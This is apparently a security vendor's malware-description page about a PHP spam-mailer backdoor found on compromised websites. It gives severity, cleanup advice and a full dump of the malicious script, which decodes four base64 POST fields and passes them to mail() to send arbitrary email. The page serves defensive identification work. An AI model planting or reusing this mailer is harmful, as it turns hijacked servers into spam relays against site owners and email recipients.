PRICING SUPPORT LOGIN

Simple yet powerful PHP mailer that utilizes the POST method of the HTTP protocol.
It requires 4 $_POST variables to work (easy to script URL by the attacker) and it can be turned into mass SPAM tool for malicious e-mail campaigns.

Severity

MEDIUM

Affecting

This malicious code affects any vulnerable or compromised website that is configured to interpret the script language.

Cleanup

Inspect your site's files, specially theme related, to find for code you don't recognize. Look for any encoded or obfuscated PHP code.
Also, you can sign up with us and let our team remove the malware for you.

Dump

if(isset($_POST["mailto"]))
$MailTo = base64_decode($_POST["mailto"]);
else
{
echo "sent_ok";
exit;
}
if(isset($_POST["msgheader"]))
$MessageHeader = base64_decode($_POST["msgheader"]);
else
{
echo "sent_ok";
exit;
}
if(isset($_POST["msgbody"]))
$MessageBody = base64_decode($_POST["msgbody"]);
else
{
echo "sent_ok";
exit;
}
if(isset($_POST["msgsubject"]))
$MessageSubject = base64_decode($_POST["msgsubject"]);
else
{
echo "sent_ok";
exit;
}
if(mail($MailTo,$MessageSubject,$MessageBody,$MessageHeader))
echo "sent_ok";
else
echo "sent_ok";